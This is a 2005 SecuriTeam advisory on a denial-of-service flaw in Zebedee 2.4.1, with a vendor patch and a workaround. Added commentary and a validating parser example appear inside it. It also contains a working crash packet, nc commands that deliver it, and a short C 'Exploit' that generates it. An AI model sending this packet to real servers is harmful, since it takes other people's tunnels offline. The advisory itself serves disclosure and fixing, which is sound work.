[NEWS] Zebedee DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 09/13/05

    To: list@securiteam.com
    Date: 13 Sep 2005 16:04:58 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Zebedee DoS
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.winton.org.uk/zebedee/> Zebedee is a simple program to
    establish an encrypted, compressed tunnel for TCP/IP or UDP data
    transfer between two systems." Lack of proper validation of the user
    provided port range allows attackers to cause the Zebedee program to
    crash.

    DETAILS

    Vulnerable Systems:
     * Zebedee version 2.4.1

    Immune Systems:
     * Zebedee version 2.4.1a

    The server crashes whenever it receives "0" as the target port number
    in the protocol option header. The 28-byte request used in the test
    session below (zebedeeDoS) looks like this:

    $ od -tx1z -Ax zebedeeDoS
    000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
    000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
    00001c

    The 9th and 10th bytes of the header (offset 0x08-0x09, the requested
    target port) are both 0x00. The following session shows the server
    listening, accepting the 28 bytes, and no longer answering afterwards:

    $ nc -vv -z -w2 zebedeehost 11965
    zebedeehost [192.168.xxx.xxx] 11965 (?) open
     sent 0, rcvd 0

    $ nc -vv zebedeehost 11965 < zebedeeDoS
    zebedeehost [192.168.xxx.xxx] 11965 (?) open
     sent 28, rcvd 2

    $ nc -vv -z -w2 zebedeehost 11965
    zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
     sent 0, rcvd 0

    $

    In zebedee.c, look at the function makeConnection(), which is called
    from server():

       1703 /* Sanity check */
       1704
       1705 assert(host != NULL && port != 0);
       1706

    Here, if the port number is 0 the assertion fails and the process
    aborts; in the test above both the connection-handling child and the
    parent listener appeared to quit, since the next probe of the port was
    refused.

    This issue occurs only when no allowed redirection ports are configured
    on the server, which is the default.
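    The following is an added example, not code from the advisory or from
    the Zebedee sources: a parser for the 28-byte request header dumped
    above, with the target-port check written as input validation that is
    logged and refused rather than as the assert() quoted from
    makeConnection(). The struct, function names and status codes are this
    example's own. The field layout follows the field comments in the
    exploit below, and big-endian byte order is inferred from the dump
    (0x2000 reads as 8192 and 0x0080 as 128). The first packet is the dump
    byte for byte; the second, asking for port 8080, is constructed for
    contrast.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ZBD_HDR_LEN 28

/* Header fields in wire order; all multi-byte fields are big-endian
 * (an inference from the dump, not taken from the Zebedee sources). */
struct zbd_request {
    uint16_t version;      /* 0x0201 in the dump */
    uint16_t flags;
    uint16_t max_size;     /* 0x2000 = 8192 bytes */
    uint16_t compression;  /* 0x0006 */
    uint16_t port;         /* requested target port; 0 is what crashes 2.4.1 */
    uint16_t key_length;   /* 0x0080 = 128 bits */
    uint32_t token;        /* key token, 0xffffffff in the dump */
    uint8_t  nonce[8];
    uint32_t target;       /* target host address; 0 means the default target */
};

enum zbd_status { ZBD_OK = 0, ZBD_SHORT = -1, ZBD_BAD_PORT = -2 };

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Decode a raw header into req; ZBD_SHORT if the buffer is truncated. */
int zbd_parse_request(const uint8_t *buf, size_t len, struct zbd_request *req)
{
    if (len < ZBD_HDR_LEN)
        return ZBD_SHORT;
    req->version     = be16(buf + 0);
    req->flags       = be16(buf + 2);
    req->max_size    = be16(buf + 4);
    req->compression = be16(buf + 6);
    req->port        = be16(buf + 8);
    req->key_length  = be16(buf + 10);
    req->token       = be32(buf + 12);
    memcpy(req->nonce, buf + 16, sizeof req->nonce);
    req->target      = be32(buf + 24);
    return ZBD_OK;
}

/* Validation in place of assert(port != 0): a zero port in data read from
 * the network is a protocol error to refuse, not a bug to abort on. */
int zbd_validate_request(const struct zbd_request *req)
{
    return req->port == 0 ? ZBD_BAD_PORT : ZBD_OK;
}

/* Parse then validate one request; the status a server would act on. */
int zbd_check_packet(const uint8_t *buf, size_t len)
{
    struct zbd_request req;
    int rc = zbd_parse_request(buf, len, &req);
    return rc != ZBD_OK ? rc : zbd_validate_request(&req);
}

/* The 28 bytes of zebedeeDoS, copied from the od dump in the advisory. */
const uint8_t zbd_dos_packet[ZBD_HDR_LEN] = {
    0x02, 0x01, 0x00, 0x00, 0x20, 0x00, 0x00, 0x06,
    0x00, 0x00, 0x00, 0x80, 0xff, 0xff, 0xff, 0xff,
    0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74,
    0x00, 0x00, 0x00, 0x00
};

/* Constructed variant: identical, but the port field asks for 8080. */
const uint8_t zbd_ok_packet[ZBD_HDR_LEN] = {
    0x02, 0x01, 0x00, 0x00, 0x20, 0x00, 0x00, 0x06,
    0x1f, 0x90, 0x00, 0x80, 0xff, 0xff, 0xff, 0xff,
    0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74,
    0x00, 0x00, 0x00, 0x00
};

int main(void)
{
    const uint8_t *pkts[] = { zbd_dos_packet, zbd_ok_packet };
    for (size_t i = 0; i < 2; i++) {
        struct zbd_request req;
        if (zbd_parse_request(pkts[i], ZBD_HDR_LEN, &req) != ZBD_OK)
            return 1;
        printf("version 0x%04x max_size %u port %u key_length %u target 0x%08x -> %s\n",
               (unsigned)req.version, (unsigned)req.max_size, (unsigned)req.port,
               (unsigned)req.key_length, (unsigned)req.target,
               zbd_validate_request(&req) == ZBD_OK
                   ? "accepted" : "request for target port 0 disallowed");
    }
    return 0;
}
```

    Run stand-alone, the program decodes both packets and reports the dump
    as refused and the constructed packet as accepted; the same
    zbd_check_packet() path also refuses a truncated header instead of
    reading past the buffer.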

    Vendor Patch:
    *** zebedee-2.4.1/zebedee.c Tue May 28 07:31:15 2002
    --- zebedee-2.4.1A/zebedee.c Tue Sep 6 21:32:03 2005
    ***************
    *** 22,28 ****
      */
      
      char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15
    ndwinton Exp $";
    ! #define RELEASE_STR "2.4.1"
      
      #include <stdio.h>
      #include <stdlib.h>
    --- 22,28 ----
      */
      
      char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15
    ndwinton Exp $";
    ! #define RELEASE_STR "2.4.1A"
      
      #include <stdio.h>
      #include <stdlib.h>
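    Review bot: RELEASE_STR becomes "2.4.1A" here while the Immune Systems entry above lists "2.4.1a"; the two should use the same case so that a version string reported by the fixed binary matches the advisory exactly.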
    ***************
    *** 3936,3941 ****
    --- 3936,3950 ----
          assert(AllowedTargets != NULL);
      
          /*
    + ** Port 0 is invalid data in the request packet, never allowed
    + */
    + if (port == 0)
    + {
    + message(0, 0, "request for target port 0 disallowed");
    + return 0;
    + }
    +
    + /*
          ** If the address is all zeroes then we will assume the default
    target
          ** host, if any.
          */
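    Review bot: the new port == 0 test is placed in the allowed-target check, after assert(AllowedTargets != NULL), yet the text above says the crash occurs precisely when no allowed redirection ports are configured; confirm this function is still reached on that default path, because otherwise the zero port still arrives at makeConnection()'s assert(host != NULL && port != 0) and the server aborts as before. Rejecting the value where the 16-bit port field is read out of the request header would cover every caller, and that assert in makeConnection() should become a logged rejection too, since an assert is not input validation for network data.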

    Workaround:
    Configuring a list of allowed redirection ports on the server prevents
    the crash, as the request is then rejected before it reaches the
    assertion.

    Exploit:
    /*
            Writes the 28-byte request shown in the od dump above to stdout;
            the two bytes at offset 0x08 (the requested target port) are zero.

            $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
            $ ./mkZebedeeDoS > zebedeeDoS
            $ nc targethost port < zebedeeDoS
    */

    #include <stdio.h>

    int main (void)
    {
            /* unsigned so that 0x80 and 0xff do not overflow a signed char */
            static const unsigned char data[] = {
            0x02, 0x01, // protocol version
            0x00, 0x00, // flags
            0x20, 0x00, // max message size (0x2000 = 8192)
            0x00, 0x06, // compression info
            0x00, 0x00, // port request: value = 0x0 (trips the assert)
            0x00, 0x80, // key length (0x0080 = 128)
            0xff, 0xff, 0xff, 0xff, // key token
            0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
            0x00, 0x00, 0x00, 0x00 // target host address (0 = default target)
             };

            /* emit the raw bytes as-is; sizeof avoids a hand-counted length */
            if (fwrite(data, 1, sizeof data, stdout) != sizeof data)
                    return 1;

            return 0;
    }

    /* EoF */

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:shiraishi@insi.co.jp>
    Shiraishi.M.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

